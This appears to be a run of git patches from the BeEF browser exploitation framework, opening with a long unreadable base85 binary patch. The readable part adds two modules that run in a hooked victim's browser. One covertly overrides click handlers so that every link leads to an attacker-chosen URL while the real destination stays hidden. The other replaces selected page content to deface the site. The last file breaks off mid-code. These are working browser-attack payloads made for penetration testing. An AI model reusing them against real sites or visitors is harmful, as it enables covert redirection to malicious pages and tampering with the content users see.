zPrb_?EjkN_vv5)rKu=SF;I&fE15h3PPt7J9FROc<j`yE2j^^1j-7q@uH{=5r1b}A|
z*IQswr120)b?LOddo%A(@GZ_kIj^AE8h-_PdpxYQ&&|$4n~~wi(VXtX=W8-1)yzy4
zu{E;g;a_;KEyC#=F@(FlL4F?OfM2lNA6FhWa}^`W#zf-B5&%BVtrl6AEe&|Cw!8K6
zPzay<kpLbwdo@Z0PRoY^*({el0yx|nH!dcMXpbQKt}2O2q;tSXj)2|T5B`QSyZ%3w
zEvpg=8FMIETkwu*<?`9g-=I!h?tb74S@#57BU=nqP`3eBzP}pyBc>a+6ML94PJq9;
z-+6H!H>D<Dm^{I8T=IsITvHLNxe#1(*jmDwulY$&WM>p>V<Y*;@G_SjY)wCLS4>sw
zZx&w{7<XKP4h|~fhHPw0ATWBRxs>;MO49A0Wa}pzcLA8P^Fzd1x!Oaae+6pue<^ge
zsInI;l-8$ufPF1_Qy}D<9bm)y&>>*k@7Quk1z9DU>2NbR1#nP}bTVtD0D8OOx^97B
zo)3^Av-P)kg(1ln2mQ4D{@kKS)kg$Od|GOv#2$8GYI+7W!O`CEho>?zw(9hqTAfE}
zGrNr&Ln>R-CEytaXCu2#HKoe0G1-gOtQ0!XfQ`WCPA*msM0>RiZQb|GRqX{naDa_x
zzI2E@8&zNeI>L7IT0l6fp;pH3s*Mnw0S~m|%l2yO%TrouKBHOxXT6%-Qf@efYOj+^
zZx$_35qT)o?zsbPU})$#iZrP#B|X<7A;S0<fMy0C&VoCw+fHeon@Z42&AKv*W@kbp
zW)mfW>(D{se5jgeE<t+?OcAViF`#K2Y6n2EP~k@1=5zjSVv_h7G0U}6t9!Xct}#nq
zqgj52IDiT0dk2l5!%P6>b71OywMK}_B5~9kR{?X`s`|+2^Tp43V6D*SqL90lQNEwH
zMqq#L?fg=~w2$t-eY)k*nJGbEw{<fjxtb1QJyio~#ebY_Hfrg*hw*d1o(ZZ}SM$5*
zs5Y|WIk67Z^OoOQN2R4;7Ne{;i=Q6ocw2XGEL9NmwM$@Ho2gzNPkZX(0-y=(>nKe}
zv9d?oh!F<{DO{5X)^cIg=%<HlGkuup2Xy9+>`PAg<T(vcL01<h3HRG&D|{jl`ixPZ
z{^y%*9^JoOImnsTK5yf6j^qAbYPY|?oS-wFnh#L(xBO1pba_Nd26aID=*|``Z5u4T
zpcX1q0M92lPwsF#<`zNxaz0&e9UbNun@N)<Jv$nJYw0x<ua8oRPx)@w8{GRIjVM=$
z;c4j0?Z=8)i<dVu!Td*l&n;fA(e`#=+E|DHX-0^W%Qq0Nzz<KG0273t_w7dOfgL9)
zv4{BtS%jo$gXQtoLUMaeDo$iHgpA~l=Cy&kOrbWuu?qMo84F#?Y%_yg;s%XBTx0OA
z%m?12Xhym)wD7zya=Qs@G)efn=8|9<Csv9{YrqG~BU0=bxaE?ZE157M+JcxC{iV?J
z+E-*@Z2(m>w#s>>6nFv#gtJ#QI=+;Y(iA_bjDksfFEwzA_N;oTj1Ki=N2HXrq&v#A
zJ8txk(7E~hDlvrPRb7KI-_o_?k#NoeS3*(q2&${1Z+W10T`HPjzo%8PLgTzZvyt=u
z90*(}ONYp?6=HDEbU9~Kc6O#Uq!NY?T*0`@v4fpM`;o20r#cq_ZL+X90|WfgDEhAv
zAvkZt<rmmPSZ!a~c3kjqI)3(_igt#;gde6x%U!5D3C2tNn?_jM)2??EThVMu<<Vq_
zhLEvbz9DV65N^m=EYXwz>LRc{p|8~hGZ!b=o3h;Oevmz_7hQUa-jt2aLUpt1$;!K&
zYdzY&apasnUyJluQ8XkwTC+CTvN`tnh}~83g_hh1y~+;&v)`K}{tjA#1U5Q{;kRC<
z@u(K&3;QD;J}wH7Zyp496e+RI-7pzZ*Ke(8?@s2Q3rw`{I!1!Gk!0VN%T+Yk_RMXZ
zmYJTjONW<+$#HII*@MkE2VFZW;I3wih1ByebXoKriw;jH8UJ3Wc{JL8!pYH(D;hpX
z?ph%m%`*E3%KJ5qM&dg;1QTx-*gS#t*ktK9_|WLT7=V*9rIiNKP@<+4-5y`*=J}Wv
z84qVF=1i)|R?+glq|&D{Q4FOfB;-geZk3oZDQer-bs@Awh3O-&rG+Kz23NxN4Wo(g
zZB}#09!&xc!5sK_4J16dLThJqm>d*SV>Z}ciAUL^nI9!J=mGihP8KIRd~bW;RTBmt
z%VPykabW|L^7F!24OE*K3vz`6X}o4x?i@Bta0G$$)tB>U9gV)zGLCeiHVF0NW=Zmf
z7yCzz8|`<a7w9zf8958LUwXs25QlpNFB4UT2&QGt?Sz!Ae|V#(8R(E|qPiea@ro`b
zpK<xoE==b{@8Dm8-L?bh$F@6fT`F*#zWqua+HJW^Aj;->f&S^Js>?X8-wj`9ua}}u
z;ZliAG2P-we>4daqDaM+?ud;zX(S&xB`9twa4ICH&`TV<5-c*wpX<Rjn{uWNq?<Up
z#1CaT;>buZJtAc7_)r^YYe88Y<60I==uU&oC&ceXX0bXF={qH^vY2c3ZiEm=EY9md
zV<}Wb*{aoO){$%uvw5QsB%lgm8j^NsV<T}UL+7PlDVk5TPuZ0J)?lOpAl-uO0rj-J
zc7m#|9n5T`7rDssD6_fu&nSQNheCp-+I-`#Ri-{VsvQ))X;xPLJ--UWjmCMy!?2ds
ziuMyb5ca1;pPUscbV)i}a#<PHJDaQU$aSsKuz^)ta%)DovfCDv**erSTEF;{lw(RF
z=f{sHgda=ZvqZl#QeW!X=kh-pcsYrUiwyKh<?mCO_#N68jUxA*D;2IMqaWiQyCv3|
z&S$}1z};WGUIrh1O48DJ-utjW)aJ}|GOt}}&Abm%lkX-jJr!O<XHZi1v=Y)e;AuOO
zb|V|3N-w<j;$ZHcyWJ86f(MMOZ(wdUn@8&Z<|9CqK(CV~g@gH2%DM|0&IuK0OW=dC
zI77e-Pppmf^{w`POL=2$euI0i;R^)F)q(fPX;5=82cg=)(1|p<14u|hRzk$sr>n_e
z#7SD@xq)W-Xm(;KkP%o9Aq!GCPo*>tVBAL2^00__d_?=G60R#uF{W|IL3#fmHUhuH
zFm3YFR11W-py>RSP9Hc!@Nj<OJA4R)#im5#!1X)=LkA~o*!7o^f|QJ6|7N7f!UP3D
z_A9-n7`MI{n?|r3aJj(bYnW+qG)w&pPMUJ>D9*Xw2^RX2-2rFK<9)`nUO6WxG0<s3
z6fONUGyZTf&q5Q&5GUOaGP9(NLnBIu{>FXUOP*$3cOOZ5)mca1)7;Od(~xM&-wYL>
z(Z@<MJti5rTczga3eq8}10SyY-0QW%DZ1AZpboGz>G%g=g#>eMg1$Q4wf*+Dk53St
zLJ)}-?TjN=rne7zUf%?#<_iwN@yRBLK<7t7^1Yzndjx39;JotviFvYxMVqDR1_!}0
z_@?r6r-2mO?r!zbN=0-nBSBE3_(Qk&?7!hc`VBDf0aI(pEr}_qI1`Pv9vhYwJo)kt
zp5Ol@W^uv()3H+Ug=DgXfz(Hi4@SPUZyvoop>Wz&j+es3HM#@UV!gptgxMFI6#&?F
zhXsEO!JCnU#@!{zu(>};D&C+AaL6lhh5r(_C9yVQ$SC74&I=pR>aeRa{j+ys+%C6Z
z{p#FMCj~Rv5CsQ7@(yuSwvBz013Vp}NlE^RX_PL2?XyO7<uMTSMHfax<5raKS=Au@
zJA+bEh!b>r;eyN~tS3B6au6QH`e(2IxU+`voGFa5Z1sM06P-)wmc2X{m2+?cLo;Pd
zosi2PErZ$CHb&sFPk$Ku$50BT2}=*6FB=p;F{$lIfQ%Ux*brSD@S^uhRi&9)lxs^K
z4Uq-{tR-*UBZgD*0wdShA-5nSqS*V|j(+DtKzMJr;bf4TOKyc{RR9XBK~<t$+iBaX
zdl3o3SKi4FDKi-yzw<kz>cn&E>g<M;*3W<&7W9VX#K;?Eq%_rdk?2L0bAFW~<qqDg
zJ-7vQ`V_uKu9Lf#-FW9K<Iab8wdoL%V<z7qyJk&b(B3D-&{ie>VX|no<3&Rlk86?k
zz8SvL<*d$u2o$vphu7Io(v00>vroO;>!>ArBUf_6AMtyK41Daw5+)#OMgJNMhD>j5
zW~<E&;t-xqRtUab8X(`Cl<+TNv0;$rqMu%R6QLF0d)#i+t#M2Zmasi4{XM*Mtxc_J
z;T%l$LZI0@Gc}JNtG2xjqdWS-`Dj6?L!Cq1)EaI;4i}*3KK^t)?~V;312)x&6K}-v
z+~&v9(o*pr8S$BU<{3mMQ`NY{ohOh#SFax6>IFodCce8XLCo2bvFt<ION&t;io6h&
z{lS68mk$v?jc*hsY9{Em4e$v!2gf+lwO*E5gZ&p8nDaOX`zRhlo0)O=9nm<yiI`Sm
zDqbLf&<?GW8A!odsvp)`+h*b(N3bc-Is-ug6)qYVQS1=k73XjCpawk#z-3;t2UOoP
z$(*3LrwGS(zwJrfcYp3=SmGHXczVB|93M7%e0uZSO=Y@2?RdEH4)!)Xqcl=&$yM7d
zCMXCN>xM)R&q+&>K%Z*`dr^Mr#ohWm;_|;-3wmfTfjT*mL%ix<Jzy^%a!?tv%`^9W
zT9`bg$hNA#Za*lj0qw>Qm9L3Vzyxmrf&)w_M_jllVo1>pSYQGCu9ZabIfs+O^Ds-B
zqCY_P4gZ!^Tn2?%*+FR1`NX^FNZ2{di*ZGT2!|H$Wg~$oXH?ZP2$p?*rtf>L8}62l
ztrYQFO}{~Le0$+{6sB=CYx#W&-3%zt0$^A`D?q?E7$JabVXZm#lzy3%FQzgYP-11}
ze2*lzO@s-}2uV;3OWeAk&@S7x)D&mR4cxHFOZ9bOdOmb1t*q^UV?z?QCZ)th-87>^
zB{i$k7P<#^&`L;*`<d!Z=J4t19e9`9u6`=(s7R?mMEY5Y@CUs*9%ylKcWSO0)i$!V
z)=(~=Fgt=q=Ejv}dYqbN>J@(V0^!0Ct~WLvv-*%TSgbg2pvDc&jv7o(j;Moj^}eXg
zYiKy04jLZlg+(xfA_~E`KW4mO8yQ9qMrJ*@)JTbh1qgWOX!^YGIBO}U75|G=>1k4c
zV^&wUYDXcUl%11uu9VTF2npv_)YmT_wJa+iijhUb`Mxz3@Wba^h}5xM)~iOc1<BX@
zhIxe5X>bmOjaDY12!(~tFx+|ktr6b@4#A}`Zd>NNX1X=l4}p}lTJc|HhEtJxJ<wqB
zh}sx25XQ@KI6Wo=<9$av;72WBJcf}~gqo2=FjRn&+^f;CuA(3BBj=dzab(xfS*o!a
zE#8R3I}p6=^kap%<WQub7}8>vKP%gVvHB?>(ykc4TqnFiXe{BGDp*t!99J0Nns{_p
zHV_}!Z;+GWiVqh`H?UV8r;ZZ?1|{(Q6p|e^K2s;L7)G6e+{~4AXWGG`Sn?JY^RI8K
zA<~X_-0lJm7UACW;4dm;&oW%{-K313G-4+1My9gRE#!oDE}-Y#O>Ce$K*`Kt_+yuy
z;8viF+fdaCv@GsmpBcE1So1P$?bzV7c^A>#@M+K(J&!|?aU%T#vU|np7jqm-<4Wow
zph^5jBzsG}`rkO4To&7KU|L2cjz*f08E39|@)uPp{~>Fmij<Nj&)tF&3I|N+-)fLD
zJ8_SPogiIJGoe4V_C-IUQ}D<_B-Q*}#p6cvuX3y;^GT>2QwGGOe7!PB);WfWTFpZA
z#Kz)i{}SmWLWQML$0LM;Uap>LM1m&Qqj_{ycAhOB5zHhrYWF$|ETyR2bw%}>WHWek
zmjf!qcCJO(U07&?DF5KbL9}RO4FOh=dXwet@q|i{2L=MG3FW9k*>Ab5-_pN|q-|Ts
zlwm9cA3hi+sIw%GKCzse=8w7ebTmP-l&qv_wcZ7jVOiVof<Jtz{|T(>$bXz)yU!xp
z6|@M1vJN<SW8Vrgu*=mSPAYjzbxk?}B4=LNt@XSJ-_LKI5?24F1?kwK8-_ck^DWnG
z`k)Lr&xPliA>kiJtgB7=vW}ibyHPVWF#`s07DY1X^~@~SsDnir>uoOZR8{u;mFx`7
zBL9GJb$hOOc~f$c+@}bE&bPhCX_=E+J%8@<Bly?zYgJ3JtrDWllQV?{c+ttN&m=JU
zO$C!K;M5IBJ2mtKzb|_P-Q)B3Tt4m6B;WB8UF$BNccN^F>?;;`y)kYnI^JPg|Jq0u
z_uBOkoSpK%#~>Obo1mj#czdq@5^{Eu%i>c?-Fr{nxqWszlWdj$lYF{-oj_Aw@(Z(-
zft{>FSdi(~wZRk(Nnj1=a4&PD@U+0_rB|-T&`mM)>P0|?WQ2G_q90Q;iPNe)fE%b)
zB7O2#5d%|+o%b|89;dBqahMJ&rj~12kc%m0_=0JkeQ=rybysqa*pkzzCmYum>MiwL
z80Ri@BfnpCm43R(l<SFgi<0t6Gee!S1k$!+nq}Bk7Fjspc{z=IuE>&4wg3Xe;IDL-
z2S8R~FX<>$;2lM__$X-In>ThOQ+5Ux$Cjv`XX+MsMUCUL9rCEn^$1I7{xV4y@d(dl
z=G>^N+(YAUswI-RZ>TfC#LhiKQvA|atl}UpT`2b$-6v06RQPu@;i#OLk&eI7+1RMv
zz3%>v31h~?hM}<6_3yM{e)r@2Lqh0Q<)-(y3ndBxngC1|D89rnoJIPmnxPV<6ag!@
z{I|?ptMLtLlL2=&pBK^nf`ME~7)`otUa27k^r9->>hq8(aoU#TKRVu*BE@#ScxhMN
zFcdTb49xH!<1V()AKtHbX#Ab8bgkO<FXQ~2M;{A?FBi6tr>*>E_rz1l%Arj1F7&OC
zo@X_z_8LRKfALC}WDvtZprY8-|3wTOL6?D)tkB~~kDdIEZ}`Mb3HOwV!N?Y}%jWq9
z*>*;FT{3r>>D=pwidYO1#-rN&taz`A#_soD^rwNk2&)F);fUL<yfE?+6E30trf}o+
zJlliYWL%7ijCB{`<W>X;BWGz-a*r|+R_vraWdjHxH2SDs&Wpj*=FVWKkfc1WT>1lZ
znV>0ls24RRlt?AlzVkv46@azuGVt-DOOx{*!wrBJKxZZ?wU<`G2}$z^$L^-1*7eoA
z<giF!a23{kZfof=yJX;Lh2Ljux82W8V7l*9sow0_Kr#2$0w&8F%R}MNyea6?<;`F7
zUFd&%??-h-Mtq_Kw}LV%jGZmy?2*qw(tBYr#%QxHi2dS@|3=~ZY<M+_Mp)q+O>c6l
zwyvPLZ7Xp=S?Wd-8dFU@cLoilIB%hFs(qt`RRUt+;(P!*J1=MDz&!)PR7r8iZ2ck)
zi-~o%&W3u;&#oQV3U174)_Ce@T+csXIM0e?N$~Q?EW;A)QRr0vimX$>$e2lcvRg^Q
zuSTd^AwR~=l#kpMC1-jsSYo=~?!5JQSBqhWi8JhTf4~2k4Rf!k41s^*oQEe>^L;`<
z{Aq6pnG#?~6Qw=;^P%BdmJuySB)vy#G1grK5BwM#*<pD+G(wS}-*F-&PDfEo@`-?X
zmx<dTpNFT7>ibDC6`bkKu+#>JwTTn4plo~Q?;xoGl8r7VLUDWlS;<D%-?vilYpfV!
z_t5uY_l_9ZcL!EE*mh*_h2hkJDY|^ASL`!Lv+m=t=qxcq%9*-a;LCC`-Uo##y+ONa
zLG{gP;FH3rDom4sac)@^Np<z~JW`f3ix3NG@JCsi@nI0gMGTLTdK{(DMkkqjivR!$
zgOun`l_+x(Bf*~J5_r=v&mn<#r`?}7^dwwVSRHUp&gM>m2Ke@g^;FYG6ekI3@c~FA
zon%6xD@hflH7O!!#gIZ);I$!W5SfN`xv)(~WD7TAX8IpBS*u+#3N}1q7^Gs^Z9Yw=
z3aL)ls6`Os;J{TbvqUTXw>PbK`&Q_7HHoglq35v}pOgWN{A$nlbe^^8@8l$^T7C^p
zP9=@Ca_tWtB=7!zp!>Tss5)GC$yssVrklNwG-E~zZ+@Rex>!Lc6==`~j*2gtGi5p-
z>Ym;=`n(AGPX7Zs&2LQ^^7P)dA#hPy3eD&N%=)I*|K;Yf2{qE^GAZvdE!LzqVFVgm
z;aF*(<tW_)KKxyuB@|qaBepgJe^4mLcz#DGU`7lmJ(!TGJ<Y%D)O3VX*0T_GtkDol
ze@p^y#m&vcCKwV$HJcr3rbF%?h@-SBg^h;cjw6I48obHIiJO+GZL(?0j1b}pP!J7-
zJ?)>;RPz*X5@GQJ?A(>oK-m~>oC02-LHRE`2oj21#?XpVM53Che{c!)U=~u)CeoSw
zO!t!`-@r9y!eH<kLdY)le3B_-@rnx!pKYa7;+<8UM`TRQOtpd!5@jiEtx<)V++Lhe
z4+}bSl_}vq<;N$BhKMRPnJV-SY-q<_H2b(mt<FZrLY0ZOE7PYHLt8h*aPF^>VD8xH
zh1`#Cu|&qdLn2`PKp9-xs^a}KIZt_^NkME_rMFzp)MLFrimSyw0N9k-Ws*Hk_IdKh
zD<3n*W(i=dLIg}H%^XX>tr>cB-<H$6pHZv8<&YtU+JQx$SBYN93O%m#h+KBNQ2=Li
zhx90zy&erS>cBc(&O4}{Sj|4!ps39(Po1|_ia$<Mmtcpg=U3hMP=bkbxB)rshT`!8
z_K*LL%+y~EcRvD19O&@d?;p3^{``X^3ugAEg~U-*hT(lq64b8>^BvjK-N#4?y1&In
zHs1wGfbj)V8IB6qEHeCp3`H$13{w0y^0~_j9c8ZWneD!7bu!2#CVuShs0%@&#Su%4
zag%<?@vGU2XFg{RNu{axWwXw>D!ha)I_S7A{Y@ncJLq}Uu`U>Xk-~b@O>z#lb22T_
z<r)+q&+>Ka0?aVjsn}2y(K4HG`8uh=5QcdQGte>@M8I1dkc9NYa!UCzz|snLiHEnk
z*Oj^{Ry0~uIab~}ca!+jFaj5%p%GS$wpEVn+<$WK_Hnb#*RxTtv!(bOMQfbxuRTh^
zSxjg-9TTUxZ1Xp3%A1&!x0Z6mZi{<=BK!6ZE$3T;$~1vla}H4O-HNTP&>#96W%4iG
z(ICzfr-G)Cd*Vf}FD|n$ha5*n5Yr&9pPPkn#jAN^-Med$o_oGu_^M9QY&^C9$Fant
zn<3U$hM(0YgEiqnw$U<IatNAAv)#PVG`8Dh5J0aY3lE28o=NJU655B&d>JVr$k&|N
zq^$jT%U?&i7lObvO#4-~eP5^P9_led$XSwpplH%jJeUu^=z-V+>U~1=4iLxL1ruuO
z{0ZN;x@{=ZcKHWi(uF3}+sr%h&jHW}a|40L<KA}aTxHyL#v6{}O)^F;pV45DXL^aE
z+Tp~Nv!`0H%@(C~`kjkWO0!hU>sDuC61TO>r)j@sG~Il`fvy0(9)Uff0V|!9pwbh?
z{db9f;pO+3XA+I>{xgDiU+}h1&wWVbW(DHTMiq6-U3RCP+F<8P5b$K4Y@;4jRuoAL
z=`OMr^Fb&a14Ux@3oMz|_NRVQ<os3$Z2sriRFnB-+^)O16hph2rJ;o%2Qfc_I9I-{
z;N^l(SLB>25z6UUSl>bKjmlhiLlj7$75CVei)L#izaY#X@8$P>rut}u^`%?WZT!Q0
zu?Sbc_oDC*x4NL#fZORooyVRy!A1)~YcEiM2qIJ8GkA7NFXoz1vKnJ*Q3&;uMys8F
z)+XMx+rjpnhh>UKv4!D48-!4rp_63$Qn}6QXJmGmKq!7|G-3<lv|(OyBfhYY?x}q%
zR_mf!OYqR^atQH^(@T!mKJc?@$>l8cPsrSx`4ytLL@g@6tmk}=`w`(VO}_(*xAjM)
zX^-9yt0#j3|E`+-%R5@Epf^914vA0cq&hdb4dOMsSW5L+8!R{Qoc;J-;<gyTIi!QK
z5gT`aWh+8wd2kp0OQzLrNvNV3<Fk7a-c00~@#b#EPcf1+QP}YHhHPKqzcNODzk8#9
zgbAb{EvkPo8|v_dt>EBmH9s*?kaY0z%B9H(vew;lt2GxT^wsYLx3<||=fEUgAY1-;
zEi7J6#OQyC#1r$>;~_FxF}dM`zI?92H#;IQJYND4FQm2&nk(?{N~ZjQqTpu}?NW{(
z%ZC~$bhmqlpD3`Mn`TPtRyL;;Az>jAXjem%#@$4>!#$Uq%m6B(JjbF-R!y;wXkm+6
z7-p$4Xy*+3kv6m+&uJ#&Um?$=FsRkQj#pogjA(Jxsx;Hn|Dv%b0QUpQ<rIoH6N~qd
z)z|A1K#v#-BU2&4SXE`hPms}Y8(H9_N7m62guKE0O9~{x;Xjx$tLSg2>zRx4!)#q0
z4j7>x&S8SxwG{yi21}>d+bh_yK|Hks6fHn&geee&{ERf;`rF52e^&D^1qGNazZham
zs0sIJ>+|aSu@l1h<JPn@k~3>`PlL;>j%Ap4g0!0kB_AudrH?JBYgJM%TosNQYWL>}
z+VVs!J(L-l0A4t&HOoJP)`|Ox$-<VMMb*_BuWosjY&G@;5a{3=MPi6mq!{dXav?1&
z?hH<)ah8&|h$Bu-(XO=g52IRahw@;3g>SM^hQM{QoMI#+>v0asQDjtylf#9CmAj6y
znQ>2}2Jz^`Ggllqt@Z}CIO%B)a6nqYM{fbFEJqN}Oc1MsK2KjP-gZtcuPB1SVq~Ku
zg1O^-`Gf~8Ko)6yEEc?BDYWN%Iu?6T^>6sx;@J_4w#-(+d0r;WP9DG3cp{1D^PqnL
zx%FQ0dS35)b6F*V_)uJ471%@RHRv<I`~g`Sc}c{`^#$=C{8JPrdp#f{Q?R{!37fQl
zJZ7QJC9x06Nit+J)di_CRf}V0<_PJVpnR9G4?z-EHMvdk1<t0~UuPXfaSw)hjp#F)
zD|<LRvS8okr|$g8zW$|2e5=wExr_$L$V=113IXTxF{0_Kl=1pztHS$AD%)V@NZVGB
zutq#^w5zggK^>NJd>JU35rgu&;9bfkSJ{JZCz+e(Hd{{cLcxO_|E{%U_r6m|nlJ&)
z#6KiKpH)F(CpOwY$I5ogC^#3V*hMpRxr~ddDT9mwon%=n6=BDK2QeoDsz@T92xq0<
zw_&+RRf4r>qTSL!hJ&Q?Fj32OY=SjejhlEx9wf3nRzwq5!-{M{zkh84{O#@W^A%WC
zP`Y9WRTdb0dKShBj^<|~AlZ%^bIMy&(nWSudc-`%bUxku7;*5P<A&1IG&viB+wX&P
z$b+64DIqpm!V!4F^G+sAP&yP+a}5Nn)+uMcJ)%y>qLO|n8?Cam2gsubxxDJM-mlE6
zs!K;BFKtwPDd10|3WX9|z0_K)KELmt-n-Ns3f|M=vt@a}-Hyd!aDp=qi70|7dOk_f
z_7HB9W%NZ@FZAn0tKO4%glJQcHJ*gPA0jONo+yXj`NAUVTm0-=oSm|R=ibc^F|>-P
zRSpXrufDHQq7Qa^-Nnb(TP>jUe%9{%i9SW)Km{F%4ayV;w^ew$EB?^Yf9=+9kypP8
zanwpc4|pdS=Y8#Kt!Q>87tvh@rVBX)PTwf{@)Ocyq!r}sm8#(v!EP=3ZT%Z0@r{nr
z3lL9*1hf|g@N=MDdIUb+V8uK<aGv_B5{w$UwR?n2TNQ~-T=K{+eGoYu)u4CZmIND4
z<omC6h<M(?_WWxTC)ZyBp*97XupQ7R5lHgxY~J3<vO>X=1MY#`gYNZzHHKp9u#(q~
zYQJb9*^LkG_9-LnP#Wp~*!s8z!B>$e!qmLe;W#W)nmCH;R`7gUzA?Ea3kYI9)vSXK
zY-A+Tb+}|wOKp*Bs)lsgzfBAi8dY`TFa46K4YL5*-a6;^Me&`@*m>w-Az$MtRpkOp
ztSzG2Hl;-WupE;=frh5n)Wk2<#quAhYpUNnYi4WG!18#!1GJ}=;V9I%c_Ib109<6{
zRTo6(%Z-dLm$2`jG^4a|Ytz?6P>-)T;;A1C`rg8y!jswT!~8ISv<@8L+qLv|CZNZ~
zeF++n_JDf{>3ZiF8Hj+m%-fkIxc^QMcq)Fo+sgF#^aAg3IYjn;%uoB#mrL+ePBc(6
zhz$>_YTICcx``nIM3V<xejeGsUk$~S`)AN(?`Ulm8m4qldA=~xT|F|4Eb&y3gUNvZ
zfuw`e_*O%9bs@RkO%7noV;SEz6Z|CSe_w~zGZcYZWhcVAb%}zqB%F-*{l5lJol@J~
z^Z<hRZ6m?=ppSd}Emb*dB)In_iVfyem){>>Dh~64pSxQ~nS(FZQa%5VX?|Rfj|ad!
ztA8h-^8Vh|Tb;4HBWw{@z1qgJo-$d+BbxE8y8Aib;_A)x(a6j8e_FpCOKmHF1CaR_
z2|K24zLbo$w3{#Ix!ud|=O9ihqgC9YDm9u!vtNm`7sK~$H)GB!iI!IXAIHCX`ue9Q
z8v{VVur8;qSL}A@y@@D{QiG@0KDVCNrKd+md|o6z<ff%rK=!4mXr6~fpO(L7t6Pqr
z-2HWRG@@Ygee?f?p@z&rY8yog+@}t3g>p=yvGn_YdaLp6$xC|s7w~55P_xoe^9yBz
z|M^;n6HWtg)fTqNQ~UpE@kO!++;>UhVo{U+e+TFPm@UbHV*xsB@|xwX{%1=X-&zE|
z)d05d<Jz6o{%=hG!>q?S!50cpoqkk_uKoWyP!$77_m$Gvv&mfepW&$?v)dpu0P8uW
za6j$;@2}%O9q>CP1w#Pn5w~iaHU9ta%JwHjPN!cvBc+--;OmhRlNYTLHt_#nDF+&!

literal 0
HcmV?d00001


From 7e57313e2100ecab00b1ddda285e32e44db75adf Mon Sep 17 00:00:00 2001
From: Christian Frichot <xntrik@gmail.com>
Date: Mon, 25 Mar 2013 19:26:59 +0800
Subject: [PATCH 241/397] New Link Rewrite (Hidden using overwritten click
 handling) module. #860

---
 core/main/client/dom.js                        | 17 +++++++++++++++++
 .../link_rewrite_click_events/command.js       | 10 ++++++++++
 .../link_rewrite_click_events/config.yaml      | 16 ++++++++++++++++
 .../link_rewrite_click_events/module.rb        | 18 ++++++++++++++++++
 4 files changed, 61 insertions(+)
 create mode 100644 modules/browser/hooked_domain/link_rewrite_click_events/command.js
 create mode 100644 modules/browser/hooked_domain/link_rewrite_click_events/config.yaml
 create mode 100644 modules/browser/hooked_domain/link_rewrite_click_events/module.rb

diff --git a/core/main/client/dom.js b/core/main/client/dom.js
index 9f737c8da..305ef0366 100644
--- a/core/main/client/dom.js
+++ b/core/main/client/dom.js
@@ -178,6 +178,23 @@ beef.dom = {
 		}).length;
 	},
 
+	/**
+	 * Rewrites all links matched by selector to url, leveraging Bilawal Hameed's hidden click event overwriting.
+	 * http://bilaw.al/2013/03/17/hacking-the-a-tag-in-100-characters.html
+	 * @param: {String} url: the url to be rewritten
+	 * @param: {String} selector: the jquery selector statement to use, defaults to all a tags.
+	 * @return: {Number} the amount of links found in the DOM and rewritten.
+	 */
+	rewriteLinksClickEvents: function(url, selector) {
+		var sel = (selector == null) ? 'a' : selector;
+		return $j(sel).each(function() {
+			if ($j(this).attr('href') != null)
+			{
+				$j(this).click(function() {this.href=url});
+			}
+		}).length;
+	},
+
 	/**
      * Parse all links in the page matched by the selector, replacing old_protocol with new_protocol (ex.:https with http)
 	 * @param: {String} old_protocol: the old link protocol to be rewritten
diff --git a/modules/browser/hooked_domain/link_rewrite_click_events/command.js b/modules/browser/hooked_domain/link_rewrite_click_events/command.js
new file mode 100644
index 000000000..ea34eadc8
--- /dev/null
+++ b/modules/browser/hooked_domain/link_rewrite_click_events/command.js
@@ -0,0 +1,10 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+    beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+beef.dom.rewriteLinksClickEvents('<%= @url %>')+' links rewritten to <%= @url %>');
+});
+
diff --git a/modules/browser/hooked_domain/link_rewrite_click_events/config.yaml b/modules/browser/hooked_domain/link_rewrite_click_events/config.yaml
new file mode 100644
index 000000000..15ba268f7
--- /dev/null
+++ b/modules/browser/hooked_domain/link_rewrite_click_events/config.yaml
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        link_rewrite_click_events:
+            enable: true
+            category: ["Browser", "Hooked Domain"]
+            name: "Replace HREFs (Click Events)"
+            description: "This module will rewrite all the href attributes of all matched links using Bilawal Hameed's updating of click event handling. This will hide the target site for all updated links."
+            authors: ["xntrik", "@bilawalhameed", "passbe"]
+            target:
+                not_working: ["O"]
+                working: ["ALL"]
diff --git a/modules/browser/hooked_domain/link_rewrite_click_events/module.rb b/modules/browser/hooked_domain/link_rewrite_click_events/module.rb
new file mode 100644
index 000000000..a8235c0ed
--- /dev/null
+++ b/modules/browser/hooked_domain/link_rewrite_click_events/module.rb
@@ -0,0 +1,18 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Link_rewrite_click_events < BeEF::Core::Command
+  
+  def self.options
+    return [
+        { 'ui_label'=>'URL', 'name'=>'url', 'description' => 'Target URL', 'value'=>'http://beefproject.com/', 'width'=>'200px' }
+    ]
+  end
+
+  def post_execute
+    save({'result' => @datastore['result']})
+  end
+  
+end

From 31e1ddddaffeb798af3b376b516ffe4619ed960d Mon Sep 17 00:00:00 2001
From: Christian Frichot <xntrik@gmail.com>
Date: Mon, 25 Mar 2013 19:33:38 +0800
Subject: [PATCH 242/397] New Defacement Module - but only rewrites targeted
 content. #861

---
 .../deface_web_page_component/command.js      | 14 ++++++++++++
 .../deface_web_page_component/config.yaml     | 15 +++++++++++++
 .../deface_web_page_component/module.rb       | 22 +++++++++++++++++++
 3 files changed, 51 insertions(+)
 create mode 100644 modules/browser/hooked_domain/deface_web_page_component/command.js
 create mode 100644 modules/browser/hooked_domain/deface_web_page_component/config.yaml
 create mode 100644 modules/browser/hooked_domain/deface_web_page_component/module.rb

diff --git a/modules/browser/hooked_domain/deface_web_page_component/command.js b/modules/browser/hooked_domain/deface_web_page_component/command.js
new file mode 100644
index 000000000..872de7bec
--- /dev/null
+++ b/modules/browser/hooked_domain/deface_web_page_component/command.js
@@ -0,0 +1,14 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var result = $j('<%= @deface_selector %>').each(function() {
+		$j(this).html('<%= @deface_content %>');
+	}).length;
+
